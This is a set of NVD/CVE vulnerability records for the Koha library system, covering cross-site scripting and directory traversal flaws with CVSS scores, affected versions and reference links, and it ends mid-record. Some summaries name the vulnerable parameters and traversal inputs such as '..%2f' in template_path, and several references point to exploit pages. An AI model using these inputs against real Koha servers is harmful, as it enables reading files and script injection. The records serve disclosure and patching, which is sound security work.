Vulnerability from fkie_nvd
Published
2023-09-17 07:15
Modified
2024-11-21 08:40
Summary
A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability.
Impacted products
Vendor Product Version
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF9BC848-073A-4AB2-8ADF-3EDA92766E4A",
              "versionEndIncluding": "23.05.03",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A vulnerability was found in KOHA up to 23.05.03. It has been declared as problematic. This vulnerability affects unknown code of the file /cgi-bin/koha/catalogue/search.pl of the component MARC. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239866 is the identifier assigned to this vulnerability."
    },
    {
      "lang": "es",
      "value": "Se ha encontrado una vulnerabilidad en KOHA hasta el 23.05.03. Se ha declarado como problem\u00e1tica. Esta vulnerabilidad afecta a c\u00f3digo desconocido del archivo /cgi-bin/koha/catalogue/search.pl del componente MARC. La manipulaci\u00f3n conduce a cross site scripting. El ataque puede iniciarse de forma remota. El exploit ha sido revelado al p\u00fablico y puede ser utilizado. VDB-239866 es el identificador asignado a esta vulnerabilidad."
    }
  ],
  "id": "CVE-2023-5025",
  "lastModified": "2024-11-21T08:40:55.030",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "cna@vuldb.com",
        "type": "Secondary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "baseSeverity": "LOW",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.1,
        "impactScore": 1.4,
        "source": "cna@vuldb.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-09-17T07:15:10.153",
  "references": [
    {
      "source": "cna@vuldb.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://vuldb.com/?ctiid.239866"
    },
    {
      "source": "cna@vuldb.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://vuldb.com/?id.239866"
    },
    {
      "source": "cna@vuldb.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.youtube.com/watch?v=b5107YkpgaM"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://vuldb.com/?ctiid.239866"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://vuldb.com/?id.239866"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.youtube.com/watch?v=b5107YkpgaM"
    }
  ],
  "sourceIdentifier": "cna@vuldb.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "cna@vuldb.com",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2018-10-18 21:29
Modified
2024-11-21 02:31
Summary
Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
References
cve@mitre.org | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 | Issue Tracking, Patch, Third Party Advisory
cve@mitre.org | https://koha-community.org/koha-3-14-16-released/ | Release Notes
cve@mitre.org | https://koha-community.org/security-release-koha-3-16-12/ | Release Notes
cve@mitre.org | https://koha-community.org/security-release-koha-3-18-8/ | Release Notes
cve@mitre.org | https://koha-community.org/security-release-koha-3-20-1/ | Release Notes
cve@mitre.org | https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | Exploit, Third Party Advisory, VDB Entry
cve@mitre.org | https://seclists.org/fulldisclosure/2015/Jun/80 | Mailing List, Third Party Advisory
cve@mitre.org | https://www.exploit-db.com/exploits/37388/ | Exploit, Third Party Advisory, VDB Entry
cve@mitre.org | https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | Release Notes, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 | Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/koha-3-14-16-released/ | Release Notes
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-16-12/ | Release Notes
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-18-8/ | Release Notes
af854a3a-2127-422b-91ae-364da2661108 | https://koha-community.org/security-release-koha-3-20-1/ | Release Notes
af854a3a-2127-422b-91ae-364da2661108 | https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2015/Jun/80 | Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/37388/ | Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108 | https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | Release Notes, Third Party Advisory
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "214E9AA7-580C-4028-AB21-0D723D3037FD",
              "versionEndExcluding": "3.14.16",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEBF9831-C8D6-4503-8192-13D04FB057DB",
              "versionEndExcluding": "3.16.12",
              "versionStartIncluding": "3.16.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6E51D4D-9FD8-44A8-8FB0-4880927429D1",
              "versionEndExcluding": "3.18.08",
              "versionStartIncluding": "3.18.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EBE685F-DE28-42F4-A071-0A14DE61D0C0",
              "versionEndExcluding": "3.20.01",
              "versionStartIncluding": "3.20.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de salto de directorio en Koha, en versiones 3.14.x anteriores a la 3.14.16, versiones 3.16.x anteriores a la 3.16.12, versiones 3.18.x anteriores a la 3.18.08 y versiones 3.20.x anteriores a la 3.20.1, permiten que atacantes remotos lean archivos arbitrarios mediante un ..%2f (punto punto barra codificada) en el par\u00e1metro template_path en (1) svc/virtualshelves/search o (2) svc/members/search."
    }
  ],
  "id": "CVE-2015-4632",
  "lastModified": "2024-11-21T02:31:26.580",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-10-18T21:29:01.333",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37388/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-18-8/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/37388/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2015-01-02 20:59
Modified
2025-04-12 10:46
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl.
Impacted products
Vendor Product Version
koha koha *
koha koha 3.18.0
koha koha 3.18.1



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C30D5198-3DD8-4A4B-9816-08F40D11550B",
              "versionEndIncluding": "3.16.05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0451D93C-F37E-42B3-88B4-9F549FBEEB9B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "E536B062-0DD1-49BA-B251-A234AFC62A02",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de XSS en el cliente Staff en Koha anterior a 3.16.6 y 3.18.x anterior a 3.18.2 permiten a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a trav\u00e9s del par\u00e1metro sort_by en el par\u00e1metro (1) opac en opac-search.pl o (2) el par\u00e1metro intranet en catalogue/search.pl."
    }
  ],
  "id": "CVE-2014-9446",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2015-01-02T20:59:04.930",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/koha-3-16-6-release/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/koha-3-18-2-release/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/61187"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/71803"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/koha-3-16-6-release/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/koha-3-18-2-release/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/61187"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/71803"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2011-12-08 19:55
Modified
2025-04-11 00:51
Severity ?
Summary
Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm.
References
cve@mitre.org | http://koha-community.org/koha-3-4-7/#more-2971
cve@mitre.org | http://koha-community.org/koha-3-6-1/#more-2929
cve@mitre.org | http://osvdb.org/77322
cve@mitre.org | http://secunia.com/advisories/46980 | Vendor Advisory
cve@mitre.org | http://www.exploit-db.com/exploits/18153 | Exploit
cve@mitre.org | http://www.securityfocus.com/bid/50812 | Exploit
cve@mitre.org | http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability&lnk=exploits/18153 | Exploit
cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/71478
cve@mitre.org | https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm
af854a3a-2127-422b-91ae-364da2661108 | http://koha-community.org/koha-3-4-7/#more-2971
af854a3a-2127-422b-91ae-364da2661108 | http://koha-community.org/koha-3-6-1/#more-2929
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/77322
af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/advisories/46980 | Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://www.exploit-db.com/exploits/18153 | Exploit
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/50812 | Exploit
af854a3a-2127-422b-91ae-364da2661108 | http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability&lnk=exploits/18153 | Exploit
af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/71478
af854a3a-2127-422b-91ae-364da2661108 | https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm
Impacted products
Vendor Product Version
koha liblime_koha *
koha koha 3.06.00.000
koha koha 3.04.00
koha koha 3.04.01
koha koha 3.04.02
koha koha 3.04.03
koha koha 3.04.04
koha koha 3.04.05
koha koha 3.04.06



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:liblime_koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A157B981-C57E-4758-8C99-D072AA00CDC6",
              "versionEndIncluding": "4.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:3.06.00.000:*:*:*:*:*:*:*",
              "matchCriteriaId": "C1FF9625-8924-4AFF-BDDD-44ECDD21B652",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:3.04.00:*:*:*:*:*:*:*",
              "matchCriteriaId": "19846DCB-7BAA-4C48-B879-4ED2133FE055",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.04.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "C7890D6D-0BBD-4C78-BE9D-6C6E74CD0B43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.04.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "52BF1075-0D4F-4615-B8DE-785ACB8146E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.04.03:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD0160D1-0198-477B-A565-9CA5E627F0BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.04.04:*:*:*:*:*:*:*",
              "matchCriteriaId": "B161E81A-158C-4BEF-B1C8-DD8C94D8E48E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.04.05:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D972C41-F258-441A-AE2B-BD82322FA9B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.04.06:*:*:*:*:*:*:*",
              "matchCriteriaId": "18A1B156-CC67-49EA-9311-9F3CBA205C1C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de salto de directorio en cgi-bin/koha/mainpage.pl en Koha v3.4 antes de v3.4.7 y v3.6 antes de v3.6.1, y LibLime Koha v4.2 y anteriores permite a atacantes remotos leer archivos de su elecci\u00f3n a trav\u00e9s de .. (punto punto) en la cookie KohaOpacLanguage de cgi-bin/opac/opac-main.pl, relacionado con Output.pm."
    }
  ],
  "id": "CVE-2011-4715",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-12-08T19:55:08.187",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://koha-community.org/koha-3-4-7/#more-2971"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://koha-community.org/koha-3-6-1/#more-2929"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/77322"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/46980"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/18153"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/50812"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://koha-community.org/koha-3-4-7/#more-2971"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://koha-community.org/koha-3-6-1/#more-2929"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/77322"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/46980"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.exploit-db.com/exploits/18153"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/50812"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

CVE-2024-28739 (GCVE-0-2024-28739)
Vulnerability from cvelistv5
Published
2024-08-06 00:00
Modified
2024-08-06 20:54
Severity ?
CWE
  • n/a
Summary
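An issue in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via a crafted script to the format parameter. Note: the CNA container of this record carries no CWE or CVSS data; the CISA ADP enrichment in the JSON below classifies the issue as CWE-79 (cross-site scripting) with a CVSS 3.1 base score of 9.6 and user interaction required.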
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "koha",
            "vendor": "koha",
            "versions": [
              {
                "lessThanOrEqual": "23.05",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.6,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "CHANGED",
              "userInteraction": "REQUIRED",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-28739",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
